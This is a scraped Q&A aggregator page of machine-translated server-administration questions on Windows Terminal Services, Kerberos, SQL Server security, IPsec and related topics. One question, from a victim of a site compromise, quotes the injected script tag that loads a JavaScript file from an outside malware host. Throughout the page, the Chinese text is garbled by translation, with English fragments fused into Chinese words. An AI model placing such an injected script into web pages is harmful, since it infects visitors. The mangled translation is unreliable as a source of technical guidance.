服务器 Gind.cn

Articles of 安全

loginterminal服务时如何限制文件系统

我需要完成的事情:只需一次login,当用户身处build筑物时,我需要他们看到一切。 当他们使用相同login的terminal服务时,他们不应该能够看到networking上的文件系统。 我可以locking运行terminal服务的PC,因为这是它的唯一用途。 细节: Windows / 2003服务器与terminal服务。 一个用户login(例如,johndoe)。 当johndoe在办公室桌面loginnetworking时,他可以根据组策略查看networking文件。 当johndoe从大楼外loginterminal服务时,我们不想让他看到networking。 使用2x做一个发布的应用程序,但该应用程序有一个“function”,允许用户看到networking。 已发布的terminal服务应用(仅限于)是一个与Windowslogin绑定的文档pipe理系统,所以我不能给他们两个login名。 只要一次login,当他们在大楼里时,我需要他们看到一切。 当他们使用terminal服务时,他们不应该能够看到networking。 我可以locking运行terminal服务的PC,因为这是它的唯一用途。

Ubuntu机器之间的帐户共享

我想要一个简单而安全的系统,允许我们networking中的用户拥有他们的帐户(例如myname)在networking中的每台机器上工作(例如,这样他们就可以ssh到任何机器并具有相同的用户ID ,安装smb份额)。 有什么build议么?

为什么Kerberos需要票证授予服务器?

这可能是一些基本的东西,但我找不到一个特定的声明。 为什么不能KDCauthentication,然后直接提供服务票证。 是关于安全还是性能呢还是其他的东西? 由于用户在每次请求服务时都没有login,所以他们可能会长时间保持login状态,因此看起来并不那么繁忙。 为什么他们必须分开?

为多种情况设置Sql服务器安全权限

我们有一个应用程序,它使用本地Sql Server实例作为其后端存储。 pipe理员的Windowslogin已经将其系统pipe理员权限撤销,而创build了两个SQLlogin名; 一个用于秘密密码的应用程序和一个只读login,我们让用户查看原始数据。 这是工作正常,直到我们移动FileStreams,这需要集成的Windows身份validation。 所以现在sql服务器login必须被replace。 因此,我现在正在检查我们所有的login信息,但我不确定它是如何可能的。 看起来,应用程序需要完全的读/写访问,但我仍然需要locking写入表,以便用户不能login到数据库和随机删除数据。 有没有人有任何提示设置多个级别的安全使用集成的Windowslogin,或者你可以指示我进一步阅读? 谢谢。

如何批量应用Windows服务器IPsec规则

操作系统:Windows Server 2003 我得到了一大堆需要在IPsec中添加的规则。 有没有什么办法,我可以做批量模式,而不是逐个添加? 如果没有,这将是一场噩梦…谢谢。

密码保护VPS帐户?

我今天订了一个VPS,即将上传我的网站。 它使用java,mysql,php等… 不过,我需要先密码保护网站… 我使用Ubuntu 9.10,并刚刚安装了LAMP。 我怎样才能最简单的做到这一点? 谢谢

公司的防火墙内是否可以有外部服务器?

我相信这是服务器pipe理员101,但我不确定的答案,并会喜欢一些帮助。 我是一名软件开发人员,他为客户构build了一个应用程序,目前正在SliceHost上成功托pipe它。 我们现在正在从testing版中脱颖而出,客户端希望在他们的防火墙内部拥有应用程序,但是他们不想处理主机和维护服务器的麻烦。 有没有一种方法可以推荐我们把服务器放在防火墙的SliceHost中? 这是一件容易的事情吗? 他们的具体要求是: 对于我的应用程序来validation他们的Active Directory,和 只允许从他们的networking访问应用程序 如果这是不可能的,我应该向我的客户推荐什么?

kollinsoy.skyefenton.com攻击?

最近我的网站遭到了恶意软件的攻击。 它将我的索引页面转换为空白。 攻击在我的index.php中添加2行: <script type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Data_Type.js"></script> <!–6aa6b5f1b4e70b5a72df7793c2b6e64b–> 我正在使用这个被认为安全的服务器的joomla 1.5.11。 它是如何发生的,以及如何防止它的未来。

eCryptFS初始化问题

我遇到了eCryptFS的第一个挂载问题。 目前当我尝试挂载它 mount -t ecryptfs ~/.Private ~/Private 但是这是错误的。 dmesg中的错误如下: Error parsing options; rc = [-22] 这是Arch的全新安装,我还没有与其他发行版有此问题。 我不太清楚问题是什么。 谢谢!

SQL Server 2008 – 安全的远程访问

我希望允许从Microsoft Access数据库远程访问SQL Server数据库,以允许我的客户端在他们希望的时候构build报表。 我可以通过在服务器上的Windows防火墙中打开相关的端口,而没有任何问题。 然而,这似乎是一个非常不安全的方式允许访问和我的服务器惊人地被某人(或多个人)试图猜测'sa'密码的目标。 虽然根据公布的指导方针,这个密码已被非常强烈地设置,但我想阻止这种情况发生。 围绕允许以这种方式访问​​服务器的最佳实践是什么? 非常感谢,安东尼
Intereting Posts
在Debian Lenny上安装Mercurial 1.5.1 如何使用dynamic虚拟主机进行共享虚拟主机设置? 连接到Cisco-CSR的GCP VPN 远程桌面会话突然结束,出现“协议错误” 替代/ etc / hosts GPO随机应用 s3服务使用s3cmd工具通过基于URL的防火墙 使用-F时,ssh无法从configuration中parsing第二个主机 nginx – 位置下的owncloud 在Ubuntu 12.04上设置FTP(vsftpd) 故障转移站点到站点VPN是否需要远程站点上的两个防火墙 MSSQL服务器:重build与重组索引和更新统计信息 Server 2008权限 ActiveSync设备导致帐户locking IIS中私有内存限制和虚拟内存限制之间的区别